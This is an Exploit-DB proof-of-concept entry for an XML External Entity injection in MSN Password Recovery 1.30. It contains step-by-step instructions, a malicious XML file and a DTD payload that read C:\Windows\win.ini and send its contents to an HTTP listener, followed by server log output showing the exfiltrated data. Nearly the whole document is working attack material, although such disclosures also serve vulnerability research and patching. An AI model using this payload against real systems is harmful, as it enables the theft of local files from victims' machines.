MSN Password Recovery 1.30 - XML External Entity Injection

EDB-ID:

47896

CVE:

N/A


Author:

ZwX

Type:

local


Platform:

XML

Date:

2020-01-09


# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2020-01-08
# Vendor Homepage : https://www.top-password.com/
# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
# Tested on OS: Windows 10


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software MSN Password Recovery
5) Click the 'Help' button and a 'Msn Password Recovery' window opens
6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml
7) Click the 'View' button
8) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -